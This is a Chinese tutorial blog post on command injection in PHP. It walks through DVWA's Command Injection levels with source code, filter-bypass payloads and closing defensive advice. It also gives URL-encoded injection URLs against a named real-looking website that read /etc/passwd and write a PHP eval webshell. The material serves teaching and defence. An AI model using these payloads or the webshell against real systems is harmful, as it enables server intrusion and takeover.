命令执行漏洞原理和测试

2023-11-16

PHP:system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞。

原理:只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。

条件:用户能够控制函数输入,存在可以执行代码的危险函数。

命令执行漏洞产生原因:

开发人员没有对特殊函数入口做过滤,导致用户可以提交恶意代码并提交服务端执行。

Web服务器没有过滤危险函数导致命令执行漏洞攻击成功。

 

命令执行漏洞带来的危害:

  1. 继承Web服务程序的权限去执行系统命令或读写文件。
  2. 反弹shell
  3. 控制整个网站甚至控制服务器。
  4. 进一步内网渗透

 

PHP中的危险函数:

  1. system:成功则返回命令输出的最后一行,失败则返回FALSE。
  2. exec:命令执行结果的最后一行内容。
  3. shell_exec:命令执行的输出。如果执行过程中发生错误或者进程不产生输出,则返回NULL。
  4. passthru:执行外部程序并且显示原始输出。
  5. eval:将输入的字符串参数当做PHP程序代码来执行。
  6. assert
  7. preg_replace
  8. call_user_func

 system(args) 有回显

passthru(args)(有回显)

exec(args) (回显最后一行-必须echo输出)

shell_exec(args) (无回显-必须输出)

反引号:``

popen(handle,mode)(无回显)

proc_open(‘cmd’,‘flag’,‘flag’)(无回显)

$process = proc_open(‘dir’,$des,$pipes);

echo stream_get_contents($pipes[1]);

DVWA:Command Injection(命令行注入)

命令连接符:

在windows和linux都支持,如果程序没有进行过滤,那么我们可以通过连接符来执行多条命令。

command1 && command2   先执行Command 1,执行成功后执行Command 2,否则不执行Command 2
command1
| command2     只执行command2

||、如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假。例如:ping2!!whoami

command1 & command2   先执行Command 1,不管是否成功,都会执行Command 2

低:

源码:

  1. <?php
  2.  
  3. if( isset( $_POST[ 'Submit' ]  ) ) {
  4.     // Get input
  5.     $target = $_REQUEST[ 'ip' ];
  6.  
  7.     // Determine OS and execute the ping command.
  8.     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
  9.         // Windows
  10.         $cmd = shell_exec( 'ping  ' . $target );
  11.     }
  12.     else {
  13.         // *nix
  14.         $cmd = shell_exec( 'ping  -c 4 ' . $target );
  15.     }
  16.  
  17.     // Feedback for the end user
  18.     echo "<pre>{$cmd}</pre>";
  19. }
  20.  
  21. ?>

strustr:搜索字符串在另一字符串中的第一次出现,返回字符串的剩余部分。

php_uname:返回运行PHP操作系统的相关描述。s:返回操作系统名称。n:返回主机名。r:返回版本名。

服务器通过判断操作系统执行不同ping命令,但是对ip参数并未做任何的过滤,导致了严重的命令注入漏洞。

由于windows和linux都可以用&&来执行多条命令,所以可以构造payload:127.0.0.1&&net user

 

中:

中等级使用的是str_replace把‘&&’,‘;’替换为空字符串,所以可以构造payload:127.0.0.1 &;&whoami

高:

  1. <?php
  2.  
  3. if( isset( $_POST[ 'Submit' ]  ) ) {
  4.     // Get input
  5.     $target = trim($_REQUEST[ 'ip' ]);
  6.  
  7.     // Set blacklist
  8.     $substitutions = array(  #黑名单过滤
  9.         '&'  => '',
  10.         ';'  => '',
  11.         '| ' => '',
  12.         '-'  => '',
  13.         '$'  => '',
  14.         '('  => '',
  15.         ')'  => '',
  16.         '`'  => '',
  17.         '||' => '',
  18.     );
  19.  
  20.     // Remove any of the charactars in the array (blacklist).
  21.     $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
  22.  
  23.     // Determine OS and execute the ping command.
  24.     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
  25.         // Windows
  26.         $cmd = shell_exec( 'ping  ' . $target );
  27.     }
  28.     else {
  29.         // *nix
  30.         $cmd = shell_exec( 'ping  -c 4 ' . $target );
  31.     }
  32.  
  33.     // Feedback for the end user
  34.     echo "<pre>{$cmd}</pre>";
  35. }
  36.  
  37. ?>

相比于前面两个等级的,高等级完善了黑名单,但是由于黑名单的局限性,我们可以看出来他只是过滤掉了“| ”,如果|后不跟空格则可以绕过过滤。可以构造payload:127.0.0.1|dir

 

 

命令执行漏洞实例:

读取当前目录文件:

http://ztsj.ztgame.com/stat.php?url=%27%26ls+%26%27       #url=’&ls&’

查看etc目录:

http://ztsj.ztgame.com/stat.php?url=%27%26ls+/etc+%26%27   #url='&ls /etc &'

读取系统密码:

http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/passwd+%26%27   # url='&echo "<?php @eval(\$_POST['value']);?>" >> php.php &'

写入一句话木马:

http://ztsj.ztgame.com/stat.php?url=%27%26echo+"<?php @eval(\$_POST['value']);?>"+>>+php.php+%26%27

#url='&echo "<?php @eval(\$_POST['value']);?>" >> php.php &'

 

命令执行的防御:

  1. 尽量不要执行外部命令。
  2. 使用自定义函数或者函数库来代替外部命令的功能。
  3. 使用escapeshe||arg函数来处理命令参数。
  4. 使用safe_mode_exec_dir指定可执行文件的路径。(safe_mode_exec_dir指定路径时可以把会使用的命令提前放入此路径内。)

 能使用脚本解决的工作,不要调用其他程序处理,尽量少用执行命令的函数,并在disabl_functions中禁用。
在进入命令执行的函数或方法之前,对参数进行过滤。
参数的值尽量使用引号包裹,并在拼接前调用addslashes进行转义。

 

 

 

 

 

 

 

 

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

命令执行漏洞原理和测试 的相关文章

  • Lattics:一款简单易用、好看强大的「类脑式」知识管理工具,笔记应用与写作软件二合一

    如何选择一款适合自己的知识管理工具 随着数字化时代的到来 越来越多的人意识到知识管理的重要性 笔记软件和写作软件作为一种常用的知识管理工具 一直以来备受关注 从最早的印象笔记 有道云 为知笔记 幕布mubu到近几年的思源 Siyuan 熊掌
  • 新的选择器+CSS变量

  • 对于System.out.println简单了解

    System out println很多人都是处于用的阶段 并没有深入的了解 我也是 之所以来了解这个东西是因为在本地开发的时候启动项目的时候发现内存不足了 这个问题就很纳闷 明明刚刚还是好好的 突然就内存不足了 想到在之前写了几个Syst
  • 预防H7N9

    传染源 目前尚不明确 根据以往经验及本次病例流行病学调查 推测可能为携带H7N9禽流感病毒 的禽类及其分泌物或排泄物 1 症状 病情表现为典型的病毒性肺炎 起病急 病程早期有高热 38度以上可给予物理降温 如冰敷 乙醇擦浴 降温毯等 儿童禁
  • 电路基础和电路模拟——复习

    目录 前言 一 第一章电路基础 1 参考方向 关联参考方向的物理意义 参考方向 关联参考方向 2 电压与电位的区别 3 在非关联参考方向下 欧姆定律 功率计算的表达式 4 电容中电流与电压关系式 5 电容储能公式和物理意义 电容储能公式 物

随机推荐

  • 数据挖掘案例实战:利用LDA主题模型提取京东评论数据(二)

    泰迪智能科技 数据挖掘平台 TipDM数据挖掘平台 最新推出的数据挖掘实战专栏 专栏将数据挖掘理论与项目案例实践相结合 可以让大家获得真实的数据挖掘学习与实践环境 更快 更好的学习数据挖掘知识与积累职业经验 专栏中每四篇文章为一个完整的数据
  • 基于Python的考研调配系统考试成绩招生调剂-爬虫可视化大屏计算机毕业设计

    更多项目资源 最下方联系我们 目录 一 项目技术介绍 二 项目配套文档 部分内容 资料获取 一 项目技术介绍 该项目含有源码 文档 PPT 配套开发软件 软件安装教程 项目发布教程 包运行成功以及课程答疑与微信售后交流群 送查重系统不限次数
  • 多层多输入的CNN-LSTM时间序列回归预测(卷积神经网络-长短期记忆网络)——附代码

    目录 摘要 卷积神经网络 CNN 的介绍 长短期记忆网络 LSTM 的介绍 CNN LSTM Matlab代码运行结果 本文Matlab代码 数据分享 摘要 本文使用CNN LSTM混合神经网络对时间序列数据进行回归预测 本模型的输入数据个
  • pandas set_index和reset_index

    mport pandas as pd df a pd DataFrame data A B C A1 B1 C1 columns first second third print df a df a set index first seco
  • [项目管理-28]:四象限法与任务的时间优先级管理

    作者主页 文火冰糖的硅基工坊 文火冰糖 王文兵 的博客 文火冰糖的硅基工坊 CSDN博客 本文网址 目录 前言 第1章 四象限法介绍 1 1 概述 1 2 四象限优先级顺序 1 3 详细说明 前言 在项目管理中 我们经常遇到对各种各样的任务
  • 让Layui的table模块支持动态表头

    layui自带的table js插件是不支持的 这里我们简单的加几个字符进去 就可以支持了 1 打开插件目录下的layui lay modules目录 用文本文件打开table js 然后搜索 item2 title 在table js将
  • idea中如何创建xml文件

    本人做java开发程序员已经三年多了 从进入企业至今一直使用idea 对此开发工具还算了解 本人使用的版本 我是一个比较守旧的人 在2020年的今天还是依然使用2017年的版本 还请光大网友见谅哈 今天想说的就是如何在idea中创建 xml
  • docker高级篇(mysql主从,redis主从搭建,Dockerfile解析及docker-compose编排)

    本篇主要是mysql主从 redis主从搭建 Dockerfile解析及docker compose编排 轻量化可视化工具Portainer 重量级工具CAdvisor InfluxDB Granfana的使用 docker的安装 配置 卸
  • 如何把swf的动画嵌入到ppt中_flash(.swf)嵌入ppt中

    利用ppt的控件工具箱中的shockwave flash object控件 添加一个swf文件到ppt 然后右击这个swf文件编辑其属性时 把EmbedMovie一项的值改为True 就表示将其嵌入ppt 你就可以删除swf源文件了 使用
  • ThinkPad E40 XP 安装SATA/AHCI驱动

    ThinkPad E40 XP 安装SATA AHCI驱动 2010 11 06 16 42 我的机子是ThinkPad E40 0578A59 安装XP之后准备打开SATA硬盘的AHCI模式并安装其驱动 但是总是安装失败 只要在BIOS里
  • 吃透这份“Java进阶核心手册”再战字节,直接把面试官按在地上摩擦

    前言 本人计算机本科 已经有两年Java开发经验 由于原来公司已经不能满足我的需求 辞去原来的工作准备跳槽大厂 在辞职之前也认为有做过一段时间的准备 2021年8月初 我满怀信心去字节跳动面试Java研发岗位 结果当场被字节面试官吊打 莫不
  • echarts后台获取数据,前台实现饼图显示并自定义图形的数据表展示格式

    1 实现效果图 切换前效果 切换后效果 2 关键的js代码 var myChart echarts init document getElementById aaa 为echarts对象加载数据 var opts post getUnitA
  • JavaScript DOM(二)查

    书接上回 节点 DOM中有许多不同类型的节点 接下来我们先看看其中的三种 元素节点 文本节点和属性节点 元素节点 指该html里面标签的名字就是元素的名字 例如 我们使用的 p p ul 和 div 之类的元素 p标签的名字是 p 无序列表
  • 安装Node(脚手架)

    目录 一 安装node 脚手架 1 1 配置vue config js 1 2 vue cli3x的目录介绍 1 3 package json 最后 一 安装node 脚手架 从官网直接下载安装即可 自带npm包管理工具 https nod
  • [1132]Flink与Kafka版本对应关系

    以下为Flink和Kafka的版本对照表 Flink版本 Kafka版本 1 12 X 2 4 1 1 11 X 2 4 1 1 10 X 2 2 1 1 9 X 2 2 0 1 8 X 2 0 1 1 7 X 2 0 1 0 10 x 0
  • 怎么把服务器安装系统还原,云服务器磁盘怎么安装系统还原

    云服务器磁盘怎么安装系统还原 内容精选 换一换 华为云帮助中心 为用户提供产品简介 价格说明 购买指南 用户指南 API参考 最佳实践 常见问题 视频帮助等技术文档 帮助您快速上手使用华为云服务 如果Windows操作系统弹性云服务器未安装
  • 程序源码分享-STM32的PID实验(含DAC和ADC)

    一 PID 算法原理 在工业应用中 PID 及其衍生算法是应用最广泛的算法之一 是当之无愧的万能算法 如果能够熟练掌握 PID 算法的设计与实现过程 对于一般的研发人员来讲 应该是足够应对一般研发问题了 在我所接触的控制算法当中 PID 控
  • python链接oracle数据库以及数据库的增删改查

    初次使用python链接oracle 所以想记录下我遇到的问题 便于向我这样初次尝试的朋友能够快速的配置好环境进入开发环节 1 首先 python链接oracle数据库需要配置好环境 我的相关环境如下 1 python Python 3 6
  • 推荐算法3—基于用户的协同过滤算法

    基于邻域的算法是推荐系统中最基本的算法 该算法分为两大类 一类是基于用户的协同过滤算法 另一类是基于物品的协同过滤算法 1 基础算法 在一个在线个性化推荐系统中 当一个用户A需要个性化推荐时 可以先找到和他有相似兴趣的其他用户 然后把那些用
  • 命令执行漏洞原理和测试

    PHP system exec shell exec passthru popen proc popen等称为高危漏洞 原理 只要程序可以调用系统命令的情况下都可以发生命令执行漏洞 条件 用户能够控制函数输入 存在可以执行代码的危险函数 命